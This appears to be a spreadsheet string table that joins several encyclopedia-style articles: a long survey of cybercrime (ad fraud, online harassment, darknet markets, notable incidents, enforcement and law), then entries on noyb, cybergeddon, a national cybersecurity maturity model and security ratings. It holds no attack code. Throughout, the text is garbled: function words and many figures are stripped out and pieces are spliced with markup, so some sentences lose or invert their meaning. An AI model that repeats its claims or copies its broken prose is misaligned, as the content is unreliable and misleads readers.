cryptocurrencies hide identities. millions reports occurrence sent authorities annually. legislation police procedures needed combat type cybercrime.an example cybersex trafficking 2018–2020 room case south korea. cyberwarfare u.s. department defense notes cyberspace emerged national-level concern several recent events geostrategic significance. among included, attack estonia's infrastructure 2007, allegedly russian hackers. august 2008, russia allegedly conducted cyber attacks, time coordinated synchronized kinetic non-kinetic campaign country georgia. fearing attacks become norm future warfare among nation-states, concept cyberspace operations impacts adapted warfighting military commanders future. computer target these crimes committed selected group criminals. unlike crimes using computer tool, crimes require technical knowledge perpetrators. such, technology evolves, nature crime. these crimes relatively new, existence long computers have—which explains unprepared society world, general, towards combating crimes. there numerous crimes nature committed daily internet. seldom committed loners, instead involves large syndicate group. crimes primarily target computer networks include: computer viruses denial-of-service attacks malware (malicious code) computer tool when individual main target cybercrime, computer considered tool rather target. these crimes generally involve less technical expertise. human weaknesses generally exploited. damage dealt largely psychological intangible, making legal action variants difficult. these crimes existed centuries offline world. scams, theft, likes existed even development high-tech equipment. criminal simply given tool increases potential pool victims makes harder trace apprehend.crimes computer networks devices advance ends include: fraud identity theft (although increasingly uses malware, hacking phishing, making example "computer target" "computer tool" crime) information warfare phishing scams spam propagation illegal obscene offensive content, including harassment threatsthe unsolicited sending bulk email commercial purposes (spam) unlawful jurisdictions. phishing mostly propagated email. phishing emails contain links websites affected malware. contain links fake online banking websites used steal private account information. obscene offensive content content websites electronic communications distasteful, obscene offensive variety reasons. instances, communications illegal. extent communications unlawful varies greatly countries, even within nations. sensitive area courts become involved arbitrating groups strong beliefs. area internet pornography target strongest efforts curtailment child pornography, illegal jurisdictions world. debarati halder jaishankar define cybercrime perspective gender defined 'cybercrime women' "crimes targeted women motive intentionally harm victim psychologically physically, using modern telecommunication networks internet mobile phones". ad-fraud ad-frauds particularly popular among cybercriminals, frauds less likely prosecuted particularly lucrative cybercrimes. jean-loup richet, professor sorbonne business school, classified large variety ad-fraud observed cybercriminal communities three categories: identity fraud; attribution fraud; ad-fraud services.identity fraud aims impersonate real users inflate audience numbers. several ad-fraud techniques relate category include traffic bots (coming hosting company data center, compromised devices); cookie stuffing; falsifying user characteristics, location browser type; fake social traffic (misleading users social networks visiting advertised website); creation fake social signals make look legitimate, instance opening twitter facebook account. attribution fraud aims impersonate real users’ behaviors (clicks, activities, conversations, etc.). multiple ad-fraud techniques belong category: hijacked devices infected users (through malware) part botnet participate fraud campaigns; click farms (companies low-wage employees paid click engage conversations affiliates’ offers); incentivized browsing; video placement abuse (delivered display banner slots); hidden (that never viewed real users); domain spoofing (ads served website advertised real-time bidding website); clickjacking (user forced click ad). fraud services related online infrastructure hosting services might needed undertake identity attribution fraud services involve creation spam websites (fake networks websites created provide artificial backlinks); link building services; hosting services; creation fake scam pages impersonating famous brand used part fraud campaign. successful ad-fraud campaign involves sophisticated combination three types ad-fraud—sending fake traffic bots using fake social accounts falsified cookies; bots click available scam page faking famous brand. online harassment whereas content offensive non-specific way, harassment directs obscenities derogatory comments specific individuals focusing example gender, race, religion, nationality, sexual orientation. there instances committing crime using computer lead enhanced sentence. example, case united states neil scott kramer, defendant given enhanced sentence according u.s. sentencing guidelines manual §2g1.3(b)(3) cell phone "persuade, induce, entice, coerce, facilitate travel minor engage prohibited sexual conduct." kramer appealed sentence grounds insufficient evidence convict statute charge included persuading computer device cellular phone technically computer. although kramer tried argue point, u.s. sentencing guidelines manual states term 'computer' "means electronic, magnetic, optical, electrochemical, high-speed data processing device performing logical, arithmetic, storage functions, includes data storage facility communications facility directly related operating conjunction device." united states alone, missouri states passed laws regulations regard extreme online harassment criminal act. these acts punished federal scale, code section 2261a, states using computers threaten harass lead sentence years, depending action taken.several countries outside united states also created laws combat online harassment. china, country supports percent world's internet users, legislative affairs office state council passed strict bullying young people bill response human flesh search engine. united kingdom passed malicious communications act, among acts 1997 2013, stated sending messages letters electronically government deemed "indecent grossly offensive" and/or language intended cause "distress anxiety" lead prison sentence months potentially large fine. australia, directly addressing issue harassment, grouped majority online harassment criminal code 1995. using telecommunication send threats harass cause offense direct violation act.although freedom speech protected democratic societies done first amendment), include types speech. fact, spoken written "true threat" speech/text criminalized "intent harm intimidate." that also applies online type network-related threats written text speech. cyberbullying increased drastically growing popularity online social networking. january 2020, adult internet users united states "personally experienced online harassment." children experience online harassment deal negative sometimes life-threatening side effects. 2021, reports displayed children developing social anxiety, children developing depression, children suicidal thoughts.the united arab emirates named spying scandal gulf nation along repressive governments purchased group’s mobile spyware pegasus mass surveillance. prominent activists journalists targeted part campaign, including, ahmed mansoor, princess latifa, princess haya, more. ghada oueiss many high-profile female journalists activists became target online harassment. oueiss filed lawsuit ruler, mohamed zayed nahyan along defendants, accusing sharing photos online. defendants including ruler filed motions dismiss case hack-and-leak attack. drug trafficking darknet markets used sell recreational drugs online. some drug traffickers encrypted messaging tools communicate drug mules. dark site silk road major online marketplace drugs shut enforcement (then reopened management, shut enforcement again). after silk road went down, silk road reloaded emerged. however, older marketplace named diabolus market, used name exposure brand's previous success.darknet markets up-rise traffic recent years many reasons. biggest contributors anonymity safety goes along using markets. there numerous ways lose money invested caught using darknet markets. vendors customers alike great lengths keep identities secret online. commonly used tools virtual private networks, tails, help hide trail left behind investigators. darknet markets make user feel safe want comfort home. people easily gain access browser duckduckgo browser allows user explore much deeper browsers google chrome. however actually gaining access illicit market simple typing search engine like would google. darknet markets special links changing everyday ending .onion opposed typical .com, .net. .org domain extensions. privacy biggest currency markets bitcoin. bitcoin allows transactions committed people exchanging wallet addresses never know anything person sending money to.one biggest issues users face marketplaces vendors market exit scamming. this usually vendor high rating they're still selling market users send money. vendor close account receiving money multiple buyers never send purchased. vendors involved illegal activities chance exit scamming longer want vendor. 2019, entire market called wall street market allegedly exit scammed, stealing million dollars vendors buyers wallets bitcoin.federal agents huge crackdown markets. july 2017, federal agents seized biggest markets commonly called alphabay ironically later re-opened august 2021 control original administrators desnake. commonly investigators pose buyer order packages darknet vendors hopes left trail follow. investigation investigator pose firearms seller months people purchased provided home addresses. they able make dozen arrests six-month investigation. another enforcement's biggest crackdowns vendors selling fentanyl opiates. with thousands people dying year drug dose long overdue enforcement crack markets. many vendors realize extra charges along selling drugs online. commonly charged money laundering charges drugs shipped mail drug distributor. each state laws regulations drugs therefore vendors face multiple charges different states. 2019, vendor sentenced years prison selling cocaine methamphetamine name jetsetlife. although many investigators spend time tracking people course year suspects identified bought sold illegal goods biggest markets. this compared thousands transactions taking place daily markets. highest profiled banking computer crime occurred course three years beginning 1970. chief teller park avenue branch york's union dime savings bank embezzled $1.5 million hundreds accounts. hacking group called (masters deception), allegedly stole passwords technical data pacific bell, nynex, telephone companies well several credit agencies major universities. damage caused extensive, company, southwestern bell suffered losses $370,000 alone. 1983, 19-year-old ucla student used break defense department international communications system. between 1995 1998 newscorp satellite view encrypted sky-tv service hacked several times ongoing technological arms race pan-european hacking group newscorp. original motivation hackers watch star trek reruns germany; something newscorp copyright allow. march 1999, melissa worm infected document victim's computer, automatically sent document copy virus spread e-mail people. february 2000, individual going alias mafiaboy began series denial-of-service attacks high-profile websites, including yahoo!, dell, inc., e*trade, ebay, cnn. about computers stanford university, also computers university california santa barbara, amongst zombie computers sending pings ddos attacks. august 2000, canadian federal prosecutors charged mafiaboy counts illegal access computers, plus total counts mischief data attacks. stuxnet worm corrupted scada microprocessors, particularly types used siemens centrifuge controllers. flame (malware) mainly targeted iranian officials attempt obtain sensitive information. russian business network (rbn) registered internet site 2006. initially, much activity legitimate. apparently, founders soon discovered profitable host illegitimate activities started hiring services criminals. described verisign "the baddest bad". offers hosting services internet access kinds criminal objectionable activities, individual activities earning $150 million year. specialized cases monopolized personal identity theft resale. originator mpack alleged operator now-defunct storm botnet. march 2010, spanish investigators arrested suspected infecting million computers around world. "botnet" infected computers included inside half fortune 1000 companies major banks, according investigators. august 2010 international investigation operation delego, operating aegis department homeland security, shut international pedophile ring dreamboard. website approximately members distributed terabytes child pornography (roughly equivalent 16,000 dvds). date single largest u.s. prosecution international child pornography ring; arrests made worldwide. january 2012 zappos.com experienced security breach many million customers' credit card numbers, personal information, billing shipping addresses compromised. june 2012 linkedin eharmony attacked, compromising million password hashes. 30,000 passwords cracked million eharmony passwords posted online. december 2012 wells fargo website experienced denial service attack. potentially compromising million customers million active viewers. other banks thought compromised: bank america, morgan u.s. bank, financial services. april 2013 associated press' twitter account's hacked hacker posted hoax tweet fictitious attacks white house claimed left president obama injured. this hoax tweet resulted brief plunge points jones industrial average, removal $136 billion index, temporary suspension ap's twitter account. jones later restored session gains. 2017, countries logged ransomware cybercrime, called "wannacry" illicit access camera sensors, microphone sensors, phonebook contacts, internet-enabled apps, metadata mobile telephones running android reportedly made accessible israeli spyware, found operation least nation-states around world. journalists, royalty government officials amongst targets. previous accusations cases israeli-weapons companies meddling international telephony smartphones eclipsed 2018 reported case. december 2019, united states intelligence investigation york times revealed messaging application united arab emirates, totok spying tool. research revealed emirati government attempted track every conversation, movement, relationship, appointment, sound image install phones. combating computer crime difficult find combat cyber crime's perpetrators internet support cross-border attacks. internet allow people targeted various locations, scale harm done magnified. cyber criminals target person time. availability virtual spaces public private sectors allowed cybercrime become everyday occurrence. 2018, internet crime complaint center received 351,937 complaints cybercrime, lead $2.7 billion lost. investigation computer source evidence (see digital forensics). even computer directly used criminal purposes, contain records value criminal investigators form logfile. countries internet service providers required, law, keep logfiles predetermined amount time. example; european wide data retention directive (applicable member states) states e-mail traffic retained minimum months. there many ways cybercrime take place, investigations tend start address trace, however, necessarily factual basis upon detectives solve case. different types high-tech crime also include elements low-tech crime, vice versa, making cybercrime investigators indispensable part modern enforcement. methods cybercrime detective work dynamic constantly improving, whether closed police units international cooperation framework. united states, federal bureau investigation (fbi) department homeland security (dhs) government agencies combat cybercrime. trained agents analysts cybercrime placed field offices headquarters. under dhs, secret service cyber intelligence section works target financial cyber crimes. they intelligence protect international cybercrime. their efforts work protect institutions, banks, intrusions information breaches. based alabama, secret service alabama office prosecution services work together train professionals enforcement creation national computer forensic institute. this institute works provide "state local members enforcement community training cyber incident response, investigation, forensic examination cyber incident response, investigation, forensic examination."due common encryption techniques hide identity location cybercriminals, difficult trace perpetrator crime committed, prevention measures crucial. prevention department homeland security also instituted continuous diagnostics mitigation (cdm) program. program monitors secures government networks tracking prioritizing network risks, informing system personnel take action. attempt catch intrusions damage done, created enhanced cybersecurity services (ecs) protect public private sectors united states. cyber security infrastructure security agency approves private partners provide intrusion detection prevention services ecs. example services offered sinkholing.many cybersecurity products technologies used organizations, cybersecurity professionals skeptical prevention-focused strategies. mode cybersecurity products also called question. google click fraud czar shuman ghosemajumder argued companies using combination individual products security scalable approach advocated cybersecurity technology primarily form services. legislation easily exploitable laws, cybercriminals developing countries order evade detection prosecution enforcement. developing countries, philippines, laws cybercrime weak sometimes nonexistent. these weak laws allow cybercriminals strike international borders remain undetected. even identified, criminals avoid punished extradited country, united states, developed laws allow prosecution. while proves difficult cases, agencies, fbi, used deception subterfuge catch criminals. example, russian hackers evading time. fake computing company based seattle, washington. they proceeded lure russian united states offering work company. upon completion interview, suspects arrested outside building. clever tricks like sometimes necessary part catching cybercriminals weak legislation makes impossible otherwise.then-president barack obama released executive order april 2015 combat cybercrime. executive order allows united states freeze assets convicted cybercriminals block economic activity within united states. this first solid legislation combats cybercrime way.the european union adopted directive 2013/40/eu. offences directive, definitions procedural institutions also council europe's convention cybercrime.it european union introducing measures cybercrime. 2017 china announced cybersecurity takes effect date.in australia, common legislation commonwealth jurisdiction applied combat cybercrime means criminal offence provisions information gathering enforcement powers include criminal code 1995 (cth), telecommunications 1997 (cth) enhancing online safety 2015 (cth). roads traffic authority south wales care park limited [2012] nswca found discovery order made upon third party purposes determining identity whereabouts person exercised merely prerequisite information requested litigation process.in dallas buyers club iinet limited [2015] 317, guidance provided interpretation rule 7.22 federal court rules 2011 (cth) respect issue extent discovery order must identify person valid request information determine identity whereabouts person circumstance end-user internet service different person account holder. justice perram stated: '... difficult identify good reason rule designed party identifying wrongdoers narrow permit identification actual wrongdoer rather witnesses wrongdoing.' penalties penalties computer-related crimes york state range fine short period jail time class misdemeanor unauthorized computer computer tampering first degree class felony carry years prison.however, hackers hired information security experts private companies inside knowledge computer crime, phenomenon theoretically could create perverse incentives. possible counter courts convicted hackers using internet computers, even released prison though computers internet become central everyday life, type punishment viewed harsh draconian. however, nuanced approaches developed manage cyber offenders' behavior without resorting total computer internet bans. these approaches involve restricting individuals specific devices subject computer monitoring computer searches probation parole officers. awareness technology advances people rely internet store sensitive information banking credit card information, criminals increasingly attempt steal information. cybercrime becoming threat people across world. raising awareness information protected tactics criminals steal information continues grow importance. according fbi's internet crime complaint center 2014, 269,422 complaints filed. with claims combined reported total loss $800,492,073. cybercrime seem average person's radar. there million cyber-attacks annually, means 4,000 attacks day, attacks every hour, nearly three attacks every minute, studies showing victims asked people carrying attacks stop. anybody uses internet reason victim, important aware protected online. intelligence cybercrime proliferated, professional ecosystem evolved support individuals groups seeking profit cybercriminal activities. ecosystem become quite specialized, including malware developers, botnet operators, professional cybercrime groups, groups specializing sale stolen content, forth. leading cybersecurity companies skills, resources visibility follow activities individuals group. wide variety information available sources used defensive purposes, including technical indicators hashes infected files malicious ips/urls, well strategic information profiling goals, techniques campaigns profiled groups. some freely published, consistent, on-going access typically requires subscribing adversary intelligence subscription service. level individual threat actor, threat intelligence often referred actor's "ttp", "tactics, techniques, procedures," infrastructure, tools, technical indicators often trivial attackers change. corporate sectors considering crucial role artificial intelligence cybersecurity.interpol cyber fusion center begun collaboration cybersecurity players distribute information latest online scams, cyber threats risks internet users. reports cutting across social engineered frauds, ransomware, phishing, since 2017 distributed security agencies countries. diffusion cybercrime broad diffusion cybercriminal activities issue computer crimes detection prosecution. hacking become less complex hacking communities greatly diffused knowledge internet. blogs communities hugely contributed information sharing: beginners could benefit older hackers' knowledge advice. furthermore, hacking cheaper ever: cloud computing era, order spam scam needed dedicated server, skills server management, network configuration, maintenance, knowledge internet service provider standards, etc. comparison, mail software-as-a-service scalable, inexpensive, bulk, transactional e-mail-sending service marketing purposes could easily spam. cloud computing could helpful cybercriminal leverage attack, terms brute-forcing password, improving reach botnet, facilitating spamming campaign. agencies asean australian high tech crime centre cyber crime investigation cell, wing mumbai police, india cyber crime unit (hellenic police), formed greece 1995 europol interpol national cyber crime unit, united kingdom national security agency, united states national white collar crime center, united states cyber police department japan national police agency also references further reading balkin, grimmelmann, katz, kozlovski, wagman, zarsky, (2006) (eds) cybercrime: digital cops networked environment, york university press, york. bowker, (2012) "the cybercrime handbook community corrections: managing risk 21st century" charles thomas publishers, ltd. springfield. brenner, (2007) smart technology, oxford: oxford university press broadhurst, chang, lennon y.c. (2013) "cybercrime asia: trends challenges", hebenton, shou, (eds), asian handbook criminology (pp. 49–64). york: springer (isbn 978-1-4614-5217-1) chang, l.y. (2012) cybercrime greater china region: regulatory responses crime prevention across taiwan strait. cheltenham: edward elgar. (isbn 978-0-85793-667-7) chang, lennon y.c., grabosky, (2014) "cybercrime establishing secure cyber world", gill (ed) handbook security (pp. 321–339). palgrave. csonka (2000) internet crime; draft council europe convention cyber-crime: response challenge crime internet? computer security report vol.16 no.5. easttom, (2010) computer crime investigation fafinski, (2009) computer misuse: response, regulation cullompton: willan glenny, darkmarket cyberthieves, cybercops, you, york, alfred knopf, 2011. isbn 978-0-307-59293-4 grabosky, (2006) electronic crime, jersey: prentice hall halder, jaishankar, (2016). cyber crimes women india. delhi: sage publishing. isbn 978-9385985775. halder, jaishankar, (2011) cybercrime victimization women: laws, rights, regulations. hershey, usa: global. isbn 978-1-60960-830-9 jaishankar, (ed.) (2011). cyber criminology: exploring internet crimes criminal behavior. boca raton, usa: press, taylor, francis group. mcquade, (2006) understanding managing cybercrime, boston: allyn bacon. mcquade, (ed) (2009) encyclopedia cybercrime, westport, greenwood press. parker (1983) fighting computer crime, u.s.: charles scribner's sons. pattavina, (ed) information technology criminal justice system, thousand oaks, sage. paul taylor (1999). hackers: crime digital sublime november 1999 ed.). routledge; edition. 200. isbn 978-0-415-18072-6. richet, j.l. (2013) from young hackers crackers, international journal technology human interaction (ijthi), 9(3), 53–62. richet, j.l. (2022). "how cybercriminal communities grow change: investigation ad-fraud communities". technological forecasting social change. (121282): 121282. doi:10.1016/j.techfore.2021.121282. issn 0040-1625. s2cid 239962449. robertson, march 2010). authorities bust infection computers. retrieved march 2010, boston news: boston.com rolón, control, vigilancia respuesta penal ciberespacio, latin american's security thinking, clacso, 2014, 167/182 walden, (2007) computer crimes digital investigations, oxford: oxford university press. wall, d.s. (2007) cybercrimes: transformation crime information age, cambridge: polity. williams, (2006) virtually criminal: crime, deviance regulation online, routledge, london. yar, (2006) cybercrime society, london: sage. external links international journal cyber criminology common types cyber attacks countering ransomware attacks government resources cybercrime.gov united states department justice national institute justice electronic crime program united states department justice cyber investigators home page secret service computer fraud australian high tech crime centre national cyber crime unit national crime agency</t>
  </si>
  <si>
    <t>NOYB</t>
  </si>
  <si>
    <t>noyb european center digital rights (styled noyb, "none business") non-profit organization based vienna, austria established 2017 pan-european focus. co-founded austrian lawyer privacy activist schrems, noyb aims launch strategic court cases media initiatives support general data protection regulation (gdpr), proposed eprivacy regulation, information privacy general. organisation established funding period raised annual donations €250,000 supporting members. currently, noyb financed 4,400 supporting members. while many privacy organisations focus attention governments, noyb puts focus privacy issues privacy violations private sector. under article gdpr foresees non-profit organizations take action represent users. noyb also recognized "qualified entity" bring consumer class actions belgium. notable actions eu–us data transfers/'schrems (2016) irish data protection commission (dpc) filed lawsuit schrems facebook 2016, based complaint 2013, so-called "safe harbor decision". back then, court justice european union (cjeu) invalidated safe harbor data transfer system decision. when case referred back irish regulator found facebook fact relied standard contact clauses, invalidated safe harbor. found "well-founded" concerns schrems instruments too, instead taking action facebook, initiated proceedings facebook schrems irish high court. case ultimately referred cjeu c-311/18 (called 'schrems ii': schrems#schrems ii). noyb supported private case schrems. "forced consent" complaints (2018) within hours general data protection regulation rules went effect 2018, noyb filed complaints facebook subsidiaries whatsapp instagram, well google (targeting android), allegedly violating article 7(4) attempting completely block services users decline accept data processing consents, bundled grant also includes consents deemed unnecessary service. based complaint, french data protection authority cnil issued fine google llc. cases still pending. apple tracking case (2020) november 2020, noyb.eu announced complaints filed german spanish data protection authorities, claiming "idfa (apple’s identifier advertisers) allows apple apps phone track user combine information online mobile behaviour". slight change previous legal strategy similar cases, noyb notes that, complaint based article5(3) e-privacy directive gdpr, spanish german authorities directly fine apple, without appealing data protection authorities gdpr. open letter gdpr cooperation mechanism (2020) noyb also focuses putting pressure regulators enforce privacy laws books. open letter, accused irish data protection commission acting slow meetings facebook coming application gdpr. schrems court justice judgment privacy shield (2020) july 2020, court justice european union (cjeu) invalidated privacy shield decided facebook companies fall surveillance laws cannot rely “standard contractual clauses” (sccs) since surveillance laws found conflicting fundamental rights. this judgement based long lasting case schrems noyb. companies’ foreign customers’ data protected u.s. intelligence services. cjeu found violates “essence” certain fundamental rights.the court also clarified data protection authorities (dpas) duty take action. court highlighted “required execute responsibility ensuring gdpr fully enforced diligence”.despite invalidations made judgment, absolutely "necessary" data flows continue flow article gdpr. situation users want data flow abroad still legal, based informed consent user, withdrawn time. equally allows data flows "necessary" fulfil contract.mass complaints eu-us data transfers (2020) after schrems judgment, filed complaints eu/eea companies controllers using google analytics facebook connect thereby transferring data despite court finding (link privacy shield) surveillance laws violate essence fundamental rights. organization thereby wanted point lack enforcement schrems these model complaints creation special taskforce european data protection board (edpb) tasked coordinate complaints prepare recommendations controllers processors. january 2022, austrian data protection authority (dsb) reached partial decision favour noyb, stating continuous google analytics violates gdpr. this decision affects websites european union since google analytics common traffic analysis tool. google advertising tracking (2021) april 2021, noyb filed complaint france charging android users tracked google without giving consent."google’s software creates aaid without user’s knowledge consent. identification number functions like license plate uniquely identifies phone user shared among companies. after creation, google third parties (e.g. applications providers advertisers) access aaid track users’ behaviour, elaborate consumption preferences provide personalised advertising. such tracking strictly regulated “cookie law” (article 5(3) e-privacy directive) requires users’ informed unambiguous consent." facebook complaint (2021) noyb filed complaint irish data protection commissioner (dpc) corruption possible bribery 2021 austrian affair concerning facebook. administrative fine grindr illegal sharing user data (2021) together norwegian consumer council, noyb filed three strategic complaints dating grindr several adtech companies illegal sharing users’ data january 2020. data shared location, address, advertising age, gender fact user question grindr. users could identified data shared, recipients could potentially share data. these complaints based report “out control” norwegian consumer council.one year complaint filed, norwegian data protection authority upheld complaint grindr, confirming grindr receive valid consent users advance notification. authority imposed fine (€9.63 mio) grindr reduced (€6.5 mio) final decision since grindr's actual revenue lower previously assumed company undertook measures remedy deficiencies previous consent management platform. action "dark patterns" cookie banners (2021) august 2021, noyb filed complaints companies using deceptive cookie banners website. this wave complaints outcome “legal tech” initiative organization course thousands websites europe automatically checked violations tool developed specifically purpose. response complaints edpb taskforce exchange views legal analysis possible infringements streamline communication effort overcome necessity cookie banners, noyb also co-developed advanced data protection control together sustainable computing vienna university economics. adpc browser signal poses feasible alternative cookie banners automated mechanism communication users’ privacy decisions data controllers’ responses. austrian court: google analytics illegal europe (2022) early 2022, austrian court ruled google analytics european websites illegal. case question filed august 2020, google user accessing austrian website health related issues. website used google analytics, data user transmitted google. google user complained austrian data protection authority alongside noyb. issue hand direct reference article gdpr, since user cannot afforded correct level protections established, thus making clear violation gdpr. france's data watchdog cnil concurred austrian ruling february 2022. schrems duly commented: this detailed sound decision. bottom line companies can't cloud services europe anymore. years since court justice confirmed second time, time also enforced. furthermore, 2022, austrian also ruled google's anonymization insufficient protecting user privacy, article gdpr allow risk-based approach google argued for. other noyb also started collaborative wiki general data protection regulation, called gdprhub.eu. webpage collect english summaries local gdpr decisions data protection authorities courts. references external links official website</t>
  </si>
  <si>
    <t>Cyberextortion</t>
  </si>
  <si>
    <t>Cybergeddon</t>
  </si>
  <si>
    <t>cybergeddon (from tech. cyber-, lit. "computer"; hebrew: megiddo, extracted megiddo ("mountain final battle")) refers cataclysm resulting large-scale sabotage computerized networks, systems activities. combines cyberterrorism, cyberwarfare, cybercrime, hacktivism scenarios wide-scale internet disruption economic collapse. economic industrial infrastructure could targeted, banks industrial control systems. since 2012, number internet-based attacks complexity increased."cybergeddon possibility," fireeye ashar aziz explained interview bloomberg: "attacks critical infrastructures power grid financial institutions could wreak havoc united states economy, fact, world economy."the defense technical information center cited nuclear electromagnetic pulse attacks part military action bring cybergeddon. references</t>
  </si>
  <si>
    <t>Cyberwarfare by China</t>
  </si>
  <si>
    <t>Cybersecurity Capacity Maturity Model for Nations</t>
  </si>
  <si>
    <t>cybersecurity capacity maturity model nations (cmm) framework developed review cybersecurity capacity maturity country across five dimensions. five dimensions covers capacity area required country improve cybersecurity posture. designed global cyber security capacity centre (gcscc) university oxford first kind framework countries review cybersecurity capacity, benchmark receive recommendation improvement. each dimension divided factors factors broken aspects. review process includes rating factor aspect along five stages represents well country respect factor aspect. recommendations includes guidance areas cybersecurity needs improvement thus require focus investment. june, 2021, framework adopted implemented countries worldwide. its' deployment catalyzed involvement international organizations organization american states (oas), world bank (wb), international telecommunication union (itu) commonwealth telecommunications union (cto) global forum cyber expertise (gfce). overview world summit information society identified capacity building realm cybersecurity pillars necessary reap benefits processes services digitalization, especially developing nations. international telecommunication union reported developing nations lack necessary cybersecurity capacity manage risk respond cyberthreats. because cyberattacks vulnerabilities nation affect parts world, maturity models developed assess cybersecurity capacity nations benchmark capacity level. models cmm.the developed 2014, collaborative effort gcscc experts academia, international regional organizations private sector. assesses capacity country five identified area called dimensions objective improving coverage, measurement effectiveness cyber security capacity building within five levels progression. benchmarking country's cybersecurity capacity involves reviewing initiatives activities entire across dimensions. according report regional assessment latin america caribbean, assessment aims identify cybersecurity gaps discover actions works.since 2014, undergone revisions intended living model remain relevant every aspect cybersecurity needs national level. structure framework consists dimensions, factors, aspects, indicators stages.dimension. dimensions represent scope country's cybersecurity capacity assessed broken factors. dimensions stand alone, rather related another nation's performance dimension capacity require input another dimension.the five dimensions 2021 version are: developing cybersecurity policy strategy this dimension examines nation fares terms availability implementation cybersecurity policies strategy. encouraging responsible cybersecurity culture within society this dimension views well citizens nation familiar digital risk provision viable channel reporting cybercriminal activities. building cybersecurity knowledge capabilities this dimension explores structures place cybersecurity awareness education within nation. creating effective legal regulatory frameworks examine ability country develop, ratify enforce cybersecurity privacy related legislation. controlling risks standards technologies this dimension examines common cybersecurity standard presence structures development technologies.factors: factors important component country's capacity whose maturity level measured factors latest version aspects aspects: these smaller subdivision factors helps understanding factor help evidence gathering measurement.indicators: each indicator define actions suggest nation maintain specific stage maturity. level maturity assigned aspect depend ability nation fulfill steps actions listed indicator. evidence required provided particular stage attained. either evidence available move higher stage, indicators within particular stage need fulfilled.stage: this represent matured nations factor aspect. there stages maturity; start-up, formative, established, strategic dynamic. nation particular maturity stage, fulfill indicators. start-up stage, nation presentable evidence show existence cybersecurity initiatives. formative evidence available proof initiatives aspects, however efforts initiation state hoc. established evidence show aspect defined, functional working adequate resource allocation lacking. strategic aspect prioritized based national need. dynamic working adaptable cybersecurity strategy available, evidenced global leadership cybersecurity issues, agility decision-making, resources allocation. development first version framework released 2014. based pilot assessments conducted countries, improvements made model updated version published 2017. based lessons learnt years deployments consultations gcscc expert advisory panel, strategic, regional implementation partners gcscc, experts academia, international regional organisations, governments, private sector, civil society, updated version released 2021.the dimensions, factors aspects changed overtime versions. 2014 dimensions factors. 2017 version dimensions factors. 2021 version dimensions factors.table lists dimensions across three versions. table list factors version. review process review process stages.stage desk research country-partner identification. first step selection country. review requested country country selected assessment international regional organization.once nation selected assessment, relationship established host country necessary stakeholders identified academia, civil societies, government ministries/department, international organizations private sector.stage review actual review stakeholders three-day consultation process based five dimensions, multiple teams created across stakeholders .open discussions focus groups method applied answers questions. questions answer also collected using online tool. inability provide evidence indicators aspect result lower maturity level aspect.remote follow-up sessions email communication used data collection.stage review report report presented country's government discretion country make publicly available not. recommendation output assessment report details gaps identified aspect present maturity level indicator. assessment report property assessed nation choose whether make public not. depending nation's need, recommend areas given priority terms resource allocation.the report include sunburst representation cybersecurity capacity nation, reason placing factor aspect particular stage recommendation done move along maturity stage.sample results reviews available gcscc's website. nations assessment gcscc website list nations assessed, listed below.albania antigua barbuda argentina armenia bahamas bangladesh barbados belize benin bhutan bolivia bosnia herzegovina botswana brazil burkina faso cabo verde cameroon chile colombia cook islands costa rica cyprus dominica dominican republic ecuador salvador eswatini fiji gambia georgia ghana grenada guatemala guyana haiti honduras iceland indonesia ivory coast jamaica kiribati kosovo kyrgyzstan lesotho liberia lithuania madagascar malawi mauritius mexico micronesia montenegro morocco mozambique myanmar namibia nicaragua niger nigeria north macedonia panama papua guinea paraguay peru rwanda saint kitts nevis saint lucia saint vincent grenadines samoa senegal serbia sierra leone somalia lanka suriname switzerland tanzania thailand tonga trinidad tobago tunisia tuvalu uganda united kingdom uruguay vanuatu venezuela zambia references</t>
  </si>
  <si>
    <t>Cybersecurity information technology list</t>
  </si>
  <si>
    <t>this list cybersecurity information technology. cybersecurity security applied information technology. this includes technology stores, manipulates, moves data, computers, data networks, devices connected included networks, routers switches. information technology devices facilities need secured intrusion, unauthorized use, vandalism. additionally, users information technology protected theft assets, extortion, identity theft, loss privacy confidentiality personal information, malicious mischief, damage equipment, business process compromise, general activity cybercriminals. public protected acts cyberterrorism, compromise loss electric power grid. cybersecurity major endeavor industry. there number professional certifications given cybersecurity training expertise. although billions dollars spent annually cybersecurity, computer network immune attacks considered completely secure. single expensive loss cybersecurity exploit iloveyou love email worm 2000, cost estimated billion american dollars.this article attempts list important wikipedia articles cybersecurity. there number minor articles reached means links listed articles. general introductory articles cybersecurity subjects: cryptography secret writing code. "plaintext" message converted sender "ciphertext" means mathematical algorithm uses secret key. receiver message reverses process converts ciphertext back original plaintext. steganography hidden writing. secret message hidden within another object, digital photograph. authentication access process potential client granted authorized facility proving identity. public infrastructure (pki) framework managing digital certificates encryption keys. tools computerized utilities designed study analyze security facilities and/or break unauthorized potentially criminal basis. threats modes potential attacks facilities. exploits violations facilities. criminal activity violation means breaking and/or misusing facilities. laws attempt prevent crimes. nation states countries governments use, misuse, and/or violate facilities achieve national goals. end-point protection securing networked computers, mobile devices terminals. network protection protection means data moved facility another. processing protection securing facilities manipulate data, computer servers, often means specialized cybersecurity hardware. storage protection protection data non-moving state, usually magnetic optical media computer memory. management security processes security technology monitored faults, deployed configured, measured usage, queried performance metrics files, and/or monitored intrusions. standards, frameworks, requirements officially agreed architectures conceptual structures designing, building, conducting cybersecurity. also references</t>
  </si>
  <si>
    <t>Cybersecurity rating</t>
  </si>
  <si>
    <t>security ratings objective, data-driven, quantifiable measurement organization’s overall cybersecurity performance. security ratings provide businesses government agencies third-party, independent view security behaviors practices organization well business partners. security ratings useful tool evaluating cyber risk facilitating collaborative, risk-based conversations.according gartner, cybersecurity ratings become important credit ratings assessing risk existing business relationships. gartner predicts services perquisite business relationships security rating services adoption security rating services platforms rise. fact, forrester consulting found respondents find security ratings valuable (37%) extremely valuable (50%). there number companies provide security ratings services, including iss, securityscorecard, panorays, bitsight, fortifydata, riskrecon, black kite upguard. security rating services 2020 covid-19 pandemic created completely different environment cyber-risk. according global ratings, rating services become exception changes world cyber-risk. given covid-19 pandemic occurred 2020, many brick mortar shops mainly exclusively accessible in-person contact, forced provide goods services website. this shift causes larger need services given increase possible clients want know safety business domain. references</t>
  </si>
  <si>
    <t>Cybersex trafficking</t>
  </si>
  <si>
